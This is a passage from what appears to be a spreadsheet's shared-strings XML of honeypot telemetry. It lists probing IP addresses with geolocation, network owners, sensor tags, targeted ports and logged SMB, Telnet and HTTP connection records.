    <t>77.247.88.133</t>
  </si>
  <si>
    <t>19.8189</t>
  </si>
  <si>
    <t>216046</t>
  </si>
  <si>
    <t>tele-co-tirana</t>
  </si>
  <si>
    <t>Teleco First</t>
  </si>
  <si>
    <t>::ffff:4df7:5885</t>
  </si>
  <si>
    <t>826c6a14557807e918e30ebe479e2887</t>
  </si>
  <si>
    <t>117.232.7.191</t>
  </si>
  <si>
    <t>::ffff:75e8:7bf</t>
  </si>
  <si>
    <t>a01961eb41e1ae6f8df7c3790423ff9d</t>
  </si>
  <si>
    <t>123.26.250.15</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;22094&amp;&amp;445&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:7b1a:fa0f</t>
  </si>
  <si>
    <t>5f70fa1568ce5d3c167bae27c6b14bb1</t>
  </si>
  <si>
    <t>117.219.75.208</t>
  </si>
  <si>
    <t>::ffff:75db:4bd0</t>
  </si>
  <si>
    <t>b88b7640dc946731495e846f53836370</t>
  </si>
  <si>
    <t>41.42.48.60</t>
  </si>
  <si>
    <t>2009-11-05</t>
  </si>
  <si>
    <t>::ffff:292a:303c</t>
  </si>
  <si>
    <t>020f9e305082cb708e1c0a8548c39b81</t>
  </si>
  <si>
    <t>191.7.71.198</t>
  </si>
  <si>
    <t>AS262404</t>
  </si>
  <si>
    <t>Jc Servicos De Internet Ltda</t>
  </si>
  <si>
    <t>::ffff:bf07:47c6</t>
  </si>
  <si>
    <t>a68f4a504d5852e7729b48a021f527fb</t>
  </si>
  <si>
    <t>171.101.4.138</t>
  </si>
  <si>
    <t>cm-171-101-4-138.revip11.asianet.co.th</t>
  </si>
  <si>
    <t>17552</t>
  </si>
  <si>
    <t>Truenet BB</t>
  </si>
  <si>
    <t>TRUENET-BB</t>
  </si>
  <si>
    <t>['CLARINET.ASIANET.CO.TH', 'CONDUCTOR.ASIANET.CO.TH', 'PIANO.ASIANET.CO.TH']</t>
  </si>
  <si>
    <t>::ffff:ab65:48a</t>
  </si>
  <si>
    <t>ba475917e487bfbff2ee0b5ea30c73b5</t>
  </si>
  <si>
    <t>59.97.182.168</t>
  </si>
  <si>
    <t>::ffff:3b61:b6a8</t>
  </si>
  <si>
    <t>93db9aa0dd52d0aa327abf242479c903</t>
  </si>
  <si>
    <t>61.1.130.14</t>
  </si>
  <si>
    <t>::ffff:3d01:820e</t>
  </si>
  <si>
    <t>4a7cd87027b82a6b2026bac478b41f7b</t>
  </si>
  <si>
    <t>117.207.160.82</t>
  </si>
  <si>
    <t>::ffff:75cf:a052</t>
  </si>
  <si>
    <t>2605a88c18ea0095a47f682828c9709f</t>
  </si>
  <si>
    <t>203.77.231.14</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SSH_H6&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;389&amp;&amp;32908&amp;&amp;1433</t>
  </si>
  <si>
    <t>-6.18416</t>
  </si>
  <si>
    <t>106.831</t>
  </si>
  <si>
    <t>9228</t>
  </si>
  <si>
    <t>PT. Total Info Kharisma</t>
  </si>
  <si>
    <t>Centralonline</t>
  </si>
  <si>
    <t>1997-04-11</t>
  </si>
  <si>
    <t>CENTRALONLINE</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,58836)}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,61076)}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,56507)}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,56796)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:cb4d:e70e</t>
  </si>
  <si>
    <t>c16c668f02029435cb371683bd7de259</t>
  </si>
  <si>
    <t>147.185.132.65</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_POP3_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25551&amp;&amp;16521&amp;&amp;23&amp;&amp;49272&amp;&amp;49878&amp;&amp;55204&amp;&amp;110&amp;&amp;54134&amp;&amp;56904&amp;&amp;49306&amp;&amp;443&amp;&amp;49705&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:8441</t>
  </si>
  <si>
    <t>90e4ad89a44f0104024a9ef3e3ff8bf4</t>
  </si>
  <si>
    <t>117.199.121.25</t>
  </si>
  <si>
    <t>::ffff:75c7:7919</t>
  </si>
  <si>
    <t>4d65ccfb45e65e913ea7d123e070adc2</t>
  </si>
  <si>
    <t>113.168.225.135</t>
  </si>
  <si>
    <t>Thanh Hóa Province</t>
  </si>
  <si>
    <t>Thành Phố Thanh Hóa</t>
  </si>
  <si>
    <t>Thanh Hóa</t>
  </si>
  <si>
    <t>1566166</t>
  </si>
  <si>
    <t>19.8</t>
  </si>
  <si>
    <t>105.767</t>
  </si>
  <si>
    <t>::ffff:71a8:e187</t>
  </si>
  <si>
    <t>cdd20e56ce8e2d4dcc718d91e91eebbf</t>
  </si>
  <si>
    <t>120.60.85.0</t>
  </si>
  <si>
    <t>::ffff:783c:5500</t>
  </si>
  <si>
    <t>43deedc5789366e2c66677a79d3273f4</t>
  </si>
  <si>
    <t>182.253.114.66</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H16</t>
  </si>
  <si>
    <t>23731&amp;&amp;1433&amp;&amp;53</t>
  </si>
  <si>
    <t>http</t>
  </si>
  <si>
    <t>2010-05-10</t>
  </si>
  <si>
    <t>BIZNET-AP</t>
  </si>
  <si>
    <t>::ffff:b6fd:7242</t>
  </si>
  <si>
    <t>49d41b0be85f2c8cad93279b663ae949</t>
  </si>
  <si>
    <t>61.1.132.202</t>
  </si>
  <si>
    <t>::ffff:3d01:84ca</t>
  </si>
  <si>
    <t>9f0b3de36bece2f738635bc5a0a5f540</t>
  </si>
  <si>
    <t>49.131.15.123</t>
  </si>
  <si>
    <t>::ffff:3183:f7b</t>
  </si>
  <si>
    <t>18f32848f714a17c3ec74e4ae6c1687f</t>
  </si>
  <si>
    <t>103.178.76.147</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SMB_H18</t>
  </si>
  <si>
    <t>Noida (Block A)</t>
  </si>
  <si>
    <t>201309</t>
  </si>
  <si>
    <t>28.6253</t>
  </si>
  <si>
    <t>77.3734</t>
  </si>
  <si>
    <t>Elyzium Digital PVT LTD</t>
  </si>
  <si>
    <t>ELYDIGI</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,64380)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,64938)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,62332)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,62848)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,63638)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,64333)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,61210)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,61843)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67b2:4c93</t>
  </si>
  <si>
    <t>9e26117683a1bcd81a9b9df219b5ebd1</t>
  </si>
  <si>
    <t>36.82.251.135</t>
  </si>
  <si>
    <t>TLKM_BB_SERVICE_36_82_DIVRE5-6</t>
  </si>
  <si>
    <t>::ffff:2452:fb87</t>
  </si>
  <si>
    <t>bf5aa26cd611917cd8f3d1527e70a2f2</t>
  </si>
  <si>
    <t>213.111.70.241</t>
  </si>
  <si>
    <t>Shevchenkivskyi Raion</t>
  </si>
  <si>
    <t>50.4758</t>
  </si>
  <si>
    <t>30.4052</t>
  </si>
  <si>
    <t>48683</t>
  </si>
  <si>
    <t>Bilink LLC</t>
  </si>
  <si>
    <t>Bilink</t>
  </si>
  <si>
    <t>::ffff:d56f:46f1</t>
  </si>
  <si>
    <t>c2a39fa05fbf7d8d5ea02daf5bd78e2c</t>
  </si>
  <si>
    <t>103.252.189.90</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H33</t>
  </si>
  <si>
    <t>SB</t>
  </si>
  <si>
    <t>West Sumatra</t>
  </si>
  <si>
    <t>Kota Padang</t>
  </si>
  <si>
    <t>Lubukbergalung</t>
  </si>
  <si>
    <t>1637193</t>
  </si>
  <si>
    <t>-0.91534</t>
  </si>
  <si>
    <t>100.458</t>
  </si>
  <si>
    <t>133335</t>
  </si>
  <si>
    <t>Politeknik Negeri Padang</t>
  </si>
  <si>
    <t>::ffff:67fc:bd5a</t>
  </si>
  <si>
    <t>c52b3082dca1d1791254c51d30f44ed2</t>
  </si>
  <si>
    <t>117.235.27.196</t>
  </si>
  <si>
    <t>::ffff:75eb:1bc4</t>
  </si>
  <si>
    <t>921d84f0cc5fb65a43bcd177db896ce9</t>
  </si>
  <si>
    <t>117.251.53.161</t>
  </si>
  <si>
    <t>::ffff:75fb:35a1</t>
  </si>
  <si>
    <t>247888c4857b582f6627f464d706cd87</t>
  </si>
  <si>
    <t>117.192.37.17</t>
  </si>
  <si>
    <t>::ffff:75c0:2511</t>
  </si>
  <si>
    <t>dea3affd76e541038ce45faf74482e92</t>
  </si>
  <si>
    <t>196.251.84.137</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>51208&amp;&amp;57112&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:c4fb:5489</t>
  </si>
  <si>
    <t>7b4838d0f96a722283cae29ea6c536ea</t>
  </si>
  <si>
    <t>37.229.0.192</t>
  </si>
  <si>
    <t>::ffff:25e5:c0</t>
  </si>
  <si>
    <t>6eb505f0534bbf77cf1d3430281e0fff</t>
  </si>
  <si>
    <t>178.137.201.201</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;24749&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b289:c9c9</t>
  </si>
  <si>
    <t>090bbdd1e5a6f6d85a7fb88e1af9741c</t>
  </si>
  <si>
    <t>103.249.80.166</t>
  </si>
  <si>
    <t>NA&amp;&amp;mail.kuntrucking.com</t>
  </si>
  <si>
    <t>New Delhi (Barakhamba)</t>
  </si>
  <si>
    <t>28.6287</t>
  </si>
  <si>
    <t>77.2257</t>
  </si>
  <si>
    <t>56272</t>
  </si>
  <si>
    <t>Pulse Telesystems Pvt Ltd</t>
  </si>
  <si>
    <t>2012-04-24 09:42:46</t>
  </si>
  <si>
    <t>2025-04-24 09:42:46</t>
  </si>
  <si>
    <t>2024-04-22 12:35:34</t>
  </si>
  <si>
    <t>['MSLABS.EARTH.ORDERBOX-DNS.COM', 'MSLABS.MARS.ORDERBOX-DNS.COM', 'MSLABS.MERCURY.ORDERBOX-DNS.COM', 'MSLABS.VENUS.ORDERBOX-DNS.COM']</t>
  </si>
  <si>
    <t>PDR Ltd. d/b/a PublicDomainRegistry.com</t>
  </si>
  <si>
    <t>abuse-contact@publicdomainregistry.com</t>
  </si>
  <si>
    <t>::ffff:67f9:50a6</t>
  </si>
  <si>
    <t>30cc1ffa89363e8ce9b2c104a8214d17</t>
  </si>
  <si>
    <t>59.95.81.46</t>
  </si>
  <si>
    <t>::ffff:3b5f:512e</t>
  </si>
  <si>
    <t>4061679855c6d552e43e3bccaa954e6a</t>
  </si>
  <si>
    <t>103.247.123.58</t>
  </si>
  <si>
    <t>-7.81091</t>
  </si>
  <si>
    <t>GMEDIA</t>
  </si>
  <si>
    <t>2012-01-31</t>
  </si>
  <si>
    <t>::ffff:67f7:7b3a</t>
  </si>
  <si>
    <t>1f4df4d03ff7936f1416043495969ee1</t>
  </si>
  <si>
    <t>211.197.186.156</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MT-CPA_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;61078&amp;&amp;46523&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;6856</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:d3c5:ba9c</t>
  </si>
  <si>
    <t>cf39b786a96ffae2a58066b5295b3775</t>
  </si>
  <si>
    <t>37.36.94.177</t>
  </si>
  <si>
    <t>::ffff:2524:5eb1</t>
  </si>
  <si>
    <t>bbcb22246c9dab3ead8c5e5d76efcc97</t>
  </si>
  <si>
    <t>120.157.250.203</t>
  </si>
  <si>
    <t>::ffff:789d:facb</t>
  </si>
  <si>
    <t>9491dca972b821eba345d4346edc4e68</t>
  </si>
  <si>
    <t>117.206.15.88</t>
  </si>
  <si>
    <t>::ffff:75ce:f58</t>
  </si>
  <si>
    <t>748ecc448c9f400e4b8f6d98df994a5d</t>
  </si>
  <si>
    <t>59.180.191.250</t>
  </si>
  <si>
    <t>::ffff:3bb4:bffa</t>
  </si>
  <si>
    <t>de44e919df4611ddde1773de1d6d0693</t>
  </si>
  <si>
    <t>136.56.187.85</t>
  </si>
  <si>
    <t>Wake</t>
  </si>
  <si>
    <t>Morrisville</t>
  </si>
  <si>
    <t>4480285</t>
  </si>
  <si>
    <t>27560</t>
  </si>
  <si>
    <t>35.8235</t>
  </si>
  <si>
    <t>-78.8256</t>
  </si>
  <si>
    <t>16591</t>
  </si>
  <si>
    <t>Google Fiber Inc.</t>
  </si>
  <si>
    <t>Google Fiber Inc</t>
  </si>
  <si>
    <t>::ffff:8838:bb55</t>
  </si>
  <si>
    <t>1e28a0e371ed1a29245e8df0c55e4409</t>
  </si>
  <si>
    <t>110.174.213.31</t>
  </si>
  <si>
    <t>7545</t>
  </si>
  <si>
    <t>TPG-INTERNET-AP</t>
  </si>
  <si>
    <t>TPG Internet Pty Ltd</t>
  </si>
  <si>
    <t>::ffff:6eae:d51f</t>
  </si>
  <si>
    <t>71bcb8acd966b34bd9a3a7cc76b6e289</t>
  </si>
  <si>
    <t>59.178.6.144</t>
  </si>
  <si>
    <t>14744&amp;&amp;23</t>
  </si>
  <si>
    <t>30.912</t>
  </si>
  <si>
    <t>75.8538</t>
  </si>
  <si>
    <t>::ffff:3bb2:690</t>
  </si>
  <si>
    <t>001cbe29b4e91ae354605a82efaa7915</t>
  </si>
  <si>
    <t>182.60.233.30</t>
  </si>
  <si>
    <t>2010-02-24</t>
  </si>
  <si>
    <t>::ffff:b63c:e91e</t>
  </si>
  <si>
    <t>b3c085406cd8f2668fcc64e614bed46a</t>
  </si>
  <si>
    <t>114.33.141.191</t>
  </si>
  <si>
    <t>114-33-141-191.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1365&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7221:8dbf</t>
  </si>
  <si>
    <t>7cd3be3bf95c286db6f0da530c1a4760</t>
  </si>
  <si>
    <t>49.37.200.26</t>
  </si>
  <si>
    <t>::ffff:3125:c81a</t>
  </si>
  <si>
    <t>a684544fd3d4e2cc168b6a8088c73f30</t>
  </si>
  <si>
    <t>117.2.217.78</t>
  </si>
  <si>
    <t>SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>Thành Phố Huế</t>
  </si>
  <si>
    <t>Huế</t>
  </si>
  <si>
    <t>1580240</t>
  </si>
  <si>
    <t>16.4619</t>
  </si>
  <si>
    <t>107.595</t>
  </si>
  <si>
    <t>::ffff:7502:d94e</t>
  </si>
  <si>
    <t>1cef0b566a90566c3f11f2e21a915203</t>
  </si>
  <si>
    <t>180.252.89.184</t>
  </si>
  <si>
    <t>Depok</t>
  </si>
  <si>
    <t>1645524</t>
  </si>
  <si>
    <t>-6.4</t>
  </si>
  <si>
    <t>106.819</t>
  </si>
  <si>
    <t>::ffff:b4fc:59b8</t>
  </si>
  <si>
    <t>006f22042b18d3c3f1f1404b8a8150a0</t>
  </si>
  <si>
    <t>103.113.76.74</t>
  </si>
  <si>
    <t>ASN-CBN</t>
  </si>
  <si>
    <t>::ffff:6771:4c4a</t>
  </si>
  <si>
    <t>ff195a4fa51a6e562a5dc1a05bbdd552</t>
  </si>
  <si>
    <t>59.3.186.85</t>
  </si>
  <si>
    <t>Haenam-gun</t>
  </si>
  <si>
    <t>Haenam-gun (Sani-myeon)</t>
  </si>
  <si>
    <t>1844748</t>
  </si>
  <si>
    <t>34.6593</t>
  </si>
  <si>
    <t>126.429</t>
  </si>
  <si>
    <t>::ffff:3b03:ba55</t>
  </si>
  <si>
    <t>525a76c091d8b2a441a4ff800955aeda</t>
  </si>
  <si>
    <t>117.205.157.59</t>
  </si>
  <si>
    <t>::ffff:75cd:9d3b</t>
  </si>
  <si>
    <t>f8b0939de0fb3d3f60ec8869a75c8699</t>
  </si>
  <si>
    <t>151.234.77.201</t>
  </si>
  <si>
    <t>Telecommunication Company</t>
  </si>
  <si>
    <t>2012-08-13</t>
  </si>
  <si>
    <t>::ffff:97ea:4dc9</t>
  </si>
  <si>
    <t>12eafc20f5265c85b0dfbf86fec64e8f</t>
  </si>
  <si>
    <t>117.201.228.11</t>
  </si>
  <si>
    <t>::ffff:75c9:e40b</t>
  </si>
  <si>
    <t>3254d3bcdcc8610c92dfa8c0212efdd0</t>
  </si>
  <si>
    <t>59.95.133.198</t>
  </si>
  <si>
    <t>::ffff:3b5f:85c6</t>
  </si>
  <si>
    <t>929915030578ae4050ce7a433d0bb053</t>
  </si>
  <si>
    <t>125.228.47.215</t>
  </si>
  <si>
    <t>125-228-47-215.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;47653&amp;&amp;23&amp;&amp;54303&amp;&amp;9100&amp;&amp;57777&amp;&amp;57801&amp;&amp;32316&amp;&amp;57825&amp;&amp;57848&amp;&amp;27785</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7de4:2fd7</t>
  </si>
  <si>
    <t>4e2fe5ea858c695790ec5bc48fb91c38</t>
  </si>
  <si>
    <t>154.204.177.54</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H17</t>
  </si>
  <si>
    <t>Cloud</t>
  </si>
  <si>
    <t>::ffff:9acc:b136</t>
  </si>
  <si>
    <t>3546b1aee58b541e4ebdd87a00ed99a8</t>
  </si>
  <si>
    <t>176.91.180.113</t>
  </si>
  <si>
    <t>::ffff:b05b:b471</t>
  </si>
  <si>
    <t>264d1c505917a655c17c37dfc44bcd46</t>
  </si>
  <si>
    <t>117.216.30.70</t>
  </si>
  <si>
    <t>::ffff:75d8:1e46</t>
  </si>
  <si>
    <t>264654639dbd694f9302d27993cf9001</t>
  </si>
  <si>
    <t>117.219.56.137</t>
  </si>
  <si>
    <t>::ffff:75db:3889</t>
  </si>
  <si>
    <t>377fc7e58e6f7054918aa6fb089f2a62</t>
  </si>
  <si>
    <t>117.211.137.137</t>
  </si>
  <si>
    <t>::ffff:75d3:8989</t>
  </si>
  <si>
    <t>44606ca6606b8369cec95979b2f279bd</t>
  </si>
  <si>
    <t>59.89.25.57</t>
  </si>
  <si>
    <t>::ffff:3b59:1939</t>
  </si>
  <si>
    <t>ace36a9f3b360c6ffba2c3debc6e2933</t>
  </si>
  <si>
    <t>103.211.134.188</t>
  </si>
  <si>
    <t>::ffff:67d3:86bc</t>
  </si>
  <si>
    <t>4ff03387fdb9765d61e8e3014fc6135c</t>
  </si>
  <si>
    <t>49.156.111.225</t>
  </si>
  <si>
    <t>Vcon Mobile And Infra Private Limited</t>
  </si>
  <si>
    <t>2010-11-26</t>
  </si>
  <si>
    <t>QUADRANT-IN</t>
  </si>
  <si>
    <t>::ffff:319c:6fe1</t>
  </si>
  <si>
    <t>01598a2e956dcf328e327113c970c2ef</t>
  </si>
  <si>
    <t>122.116.168.131</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-116-168-131.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>::ffff:7a74:a883</t>
  </si>
  <si>
    <t>bd9ddfdfde124a571d3036c404eece4c</t>
  </si>
  <si>
    <t>223.226.232.7</t>
  </si>
  <si>
    <t>26.8393</t>
  </si>
  <si>
    <t>80.9231</t>
  </si>
  <si>
    <t>::ffff:dfe2:e807</t>
  </si>
  <si>
    <t>09af2f006e131108688d6b47cf076fb7</t>
  </si>
  <si>
    <t>202.66.166.142</t>
  </si>
  <si>
    <t>static-ip-142-166-66-202.rev.dyxnet.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:ca42:a68e</t>
  </si>
  <si>
    <t>3af683fa5743bbe437452ff419959771</t>
  </si>
  <si>
    <t>151.115.90.142</t>
  </si>
  <si>
    <t>89102c31-a580-464e-aca8-81212020fc3e.pl-waw-2.baremetal.scw.cloud&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SOCKS5_H11</t>
  </si>
  <si>
    <t>8443&amp;&amp;1080</t>
  </si>
  <si>
    <t>Przysucha County</t>
  </si>
  <si>
    <t>Przysucha</t>
  </si>
  <si>
    <t>761008</t>
  </si>
  <si>
    <t>51.3586</t>
  </si>
  <si>
    <t>20.6289</t>
  </si>
  <si>
    <t>Online S.A.S.</t>
  </si>
  <si>
    <t>Scaleway</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:9773:5a8e</t>
  </si>
  <si>
    <t>b5ab3c78f1d6413904cbe4577d943686</t>
  </si>
  <si>
    <t>110.227.210.141</t>
  </si>
  <si>
    <t>Mumbai (Borivali)</t>
  </si>
  <si>
    <t>19.2307</t>
  </si>
  <si>
    <t>72.8567</t>
  </si>
  <si>
    <t>Bharti Airtel Services Limited</t>
  </si>
  <si>
    <t>2009-05-11</t>
  </si>
  <si>
    <t>ABTS-DSL-MUM</t>
  </si>
  <si>
    <t>::ffff:6ee3:d28d</t>
  </si>
  <si>
    <t>5681074a9ee1aa05f46c31e5cdcc5be3</t>
  </si>
  <si>
    <t>49.47.135.6</t>
  </si>
  <si>
    <t>Nalanda</t>
  </si>
  <si>
    <t>Rājgīr</t>
  </si>
  <si>
    <t>1258864</t>
  </si>
  <si>
    <t>25.0283</t>
  </si>
  <si>
    <t>85.4208</t>
  </si>
  <si>
    <t>::ffff:312f:8706</t>
  </si>
  <si>
    <t>dfd6235c0c94590ec307a26faf791cd0</t>
  </si>
  <si>
    <t>117.212.56.145</t>
  </si>
  <si>
    <t>::ffff:75d4:3891</t>
  </si>
  <si>
    <t>cee249c1f7b8c26c6cf44ef2fa5afd79</t>
  </si>
  <si>
    <t>191.53.48.212</t>
  </si>
  <si>
    <t>::ffff:bf35:30d4</t>
  </si>
  <si>
    <t>8d974c72486a403d7b7c232a44bc6d92</t>
  </si>
  <si>
    <t>120.56.150.67</t>
  </si>
  <si>
    <t>::ffff:7838:9643</t>
  </si>
  <si>
    <t>f07e103277683156ad4acce13ca8ee5a</t>
  </si>
  <si>
    <t>59.177.111.129</t>
